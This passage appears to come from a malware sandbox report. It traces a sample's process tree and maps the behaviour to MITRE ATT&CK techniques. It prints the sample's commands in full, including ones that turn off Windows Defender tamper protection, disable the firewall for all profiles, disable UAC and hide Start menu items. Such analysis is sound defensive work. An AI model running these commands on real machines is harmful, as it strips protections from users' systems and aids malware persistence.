    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
    3⤵
    PID:5472
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
  2⤵
  PID:5032
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
    3⤵
    PID:4072
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings' -Name 'NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings' -Name 'NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2736
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowControlPanel /t REG_DWORD /d 0 /f
  2⤵
  PID:3664
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5688
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowControlPanel /t REG_DWORD /d 0 /f
    3⤵
    PID:1420
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyComputer /t REG_DWORD /d 0 /f
  2⤵
  PID:2292
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyComputer /t REG_DWORD /d 0 /f
    3⤵
    PID:4440
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyDocuments /t REG_DWORD /d 0 /f
  2⤵
  PID:2416
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyDocuments /t REG_DWORD /d 0 /f
    3⤵
    PID:4368
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyMusic /t REG_DWORD /d 0 /f
  2⤵
  PID:5260
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyMusic /t REG_DWORD /d 0 /f
    3⤵
    PID:4608
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyPictures /t REG_DWORD /d 0 /f
  2⤵
  PID:5844
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyPictures /t REG_DWORD /d 0 /f
    3⤵
    PID:4200
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRecentDocs /t REG_DWORD /d 0 /f
  2⤵
  PID:3280
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRecentDocs /t REG_DWORD /d 0 /f
    3⤵
    PID:448
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRun /t REG_DWORD /d 0 /f
  2⤵
  PID:2656
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRun /t REG_DWORD /d 0 /f
    3⤵
    PID:5408
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowSearch /t REG_DWORD /d 0 /f
  2⤵
  PID:5220
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowSearch /t REG_DWORD /d 0 /f
    3⤵
    PID:3548
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowUser /t REG_DWORD /d 0 /f
  2⤵
  PID:5692
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowUser /t REG_DWORD /d 0 /f
    3⤵
    PID:5184
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' -Name 'TamperProtection' -Value 0"
  2⤵
  - Modifies Windows Defender TamperProtection settings
  - Command and Scripting Interpreter: PowerShell
  PID:5700
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
  2⤵
  PID:2936
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
    3⤵
    - Modifies Windows Defender TamperProtection settings
    PID:1564
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c NetSh Advfirewall set allprofiles state off
  2⤵
  PID:5832
- - C:\Windows\system32\netsh.exe
    NetSh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4488
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
  2⤵
  PID:4996
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    PID:2104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' -Name 'TamperProtection' -Value 0"
  2⤵
  - Modifies Windows Defender TamperProtection settings
  - Command and Scripting Interpreter: PowerShell
  PID:4376

C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe
C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe
1⤵
- Executes dropped EXE
PID:1200

C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe
C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe
1⤵
- Executes dropped EXE
PID:4696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

Indicator Removal

T1070

Clear Persistence

T1070.009

File Deletion

T1070.004

Modify Registry